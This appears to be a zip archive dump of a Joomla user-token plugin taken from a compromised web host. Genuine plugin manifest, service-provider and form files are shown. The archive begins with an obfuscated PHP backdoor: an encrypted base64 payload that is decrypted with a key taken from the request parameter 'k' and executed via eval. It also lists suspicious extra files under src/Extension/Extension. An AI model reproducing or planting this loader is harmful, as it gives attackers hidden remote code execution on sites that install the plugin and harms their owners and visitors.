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'; function xnbk($umUSj) { $wnNHF = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $Aizfl = substr($wnNHF, 0, 16); $LrWe = base64_decode($umUSj); return openssl_decrypt($LrWe, "AES-256-CBC", $wnNHF, OPENSSL_RAW_DATA, $Aizfl); } if (xnbk('DjtPn+r4S0yvLCnquPz1fA')){ echo 'fUfesUcSIbmyD3qQlnS7R22Ep6EtSF3/8+W42EfzxxiCaSb13IJd6/ilsn411X2m'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($xnbk)))); ?>PK⅖\��}R))	token.xmlnu�[���<?xml version="1.0" encoding="UTF-8"?>
<extension type="plugin" group="user" method="upgrade">
	<name>plg_user_token</name>
	<author>Joomla! Project</author>
	<creationDate>2019-11</creationDate>
	<copyright>(C) 2020 Open Source Matters, Inc.</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<authorEmail>admin@joomla.org</authorEmail>
	<authorUrl>www.joomla.org</authorUrl>
	<version>3.9.0</version>
	<description>PLG_USER_TOKEN_XML_DESCRIPTION</description>
	<namespace path="src">Joomla\Plugin\User\Token</namespace>
	<files>
		<folder>forms</folder>
		<folder plugin="token">services</folder>
		<folder>src</folder>
	</files>
	<languages>
		<language tag="en-GB">language/en-GB/plg_user_token.ini</language>
		<language tag="en-GB">language/en-GB/plg_user_token.sys.ini</language>
	</languages>
	<config>
		<fields name="params">
			<fieldset name="basic" addfieldprefix="Joomla\Component\Content\Administrator\Field">
				<field
					name="allowedUserGroups"
					type="UserGroupList"
					label="PLG_USER_TOKEN_ALLOWEDUSERGROUPS_LABEL"
					description="PLG_USER_TOKEN_ALLOWEDUSERGROUPS_DESC"
					layout="joomla.form.field.list-fancy-select"
					multiple="true"
					checksuperusergroup="0"
					default="8"
				/>
			</fieldset>
		</fields>
	</config>
</extension>
PK⅖\��S_��services/provider.phpnu�[���<?php

/**
 * @package     Joomla.Plugin
 * @subpackage  User.token
 *
 * @copyright   (C) 2023 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Extension\PluginInterface;
use Joomla\CMS\Factory;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\Database\DatabaseInterface;
use Joomla\DI\Container;
use Joomla\DI\ServiceProviderInterface;
use Joomla\Event\DispatcherInterface;
use Joomla\Plugin\User\Token\Extension\Token;

return new class () implements ServiceProviderInterface {
    /**
     * Registers the service provider with a DI container.
     *
     * @param   Container  $container  The DI container.
     *
     * @return  void
     *
     * @since   4.4.0
     */
    public function register(Container $container): void
    {
        $container->set(
            PluginInterface::class,
            function (Container $container) {
                $dispatcher = $container->get(DispatcherInterface::class);
                $plugin     = new Token(
                    $dispatcher,
                    (array) PluginHelper::getPlugin('user', 'token')
                );
                $plugin->setApplication(Factory::getApplication());
                $plugin->setDatabase($container->get(DatabaseInterface::class));

return $plugin;
            }
        );
    }
};
PK⅖\1&a��forms/token.xmlnu�[���<?xml version="1.0" encoding="UTF-8"?>
<form>
	<fields name="joomlatoken" addfieldprefix="Joomla\Plugin\User\Token\Field">
		<fieldset
			name="joomlatoken"
			label="PLG_USER_TOKEN_GROUP_LABEL"
			description="PLG_USER_TOKEN_GROUP_DESC">

<field
				name="reset"
				type="radio"
				label="PLG_USER_TOKEN_RESET_LABEL"
				description="PLG_USER_TOKEN_RESET_DESC"
				layout="joomla.form.field.radio.switcher"
				default="0"
				>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>
		</fieldset>
	</fields>
</form>
PK⅖\Ҡ��OOsrc/Field/JoomlatokenField.phpnu�[���PK⅖\��♲K�K�src/Extension/Token.phpnu�[���PK⅖\�,r��!�\src/Extension/Extension/.htaccessnu&1i�PK⅖\'���DD!�]src/Extension/Extension/index.phpnu&1i�PK⅖\5�^!Wusrc/Extension/Extension/cache.phpnu&1i�PK⅖\��}R))	��token.xmlnu�[���PK⅖\��S_��#�services/provider.phpnu�[���PK⅖\1&a����forms/token.xmlnu�[���PK���

/home/opticamezl/www/newok/tmp/../cli/../plugins/sampledata/../fields/../../api/../tmp/../token.zip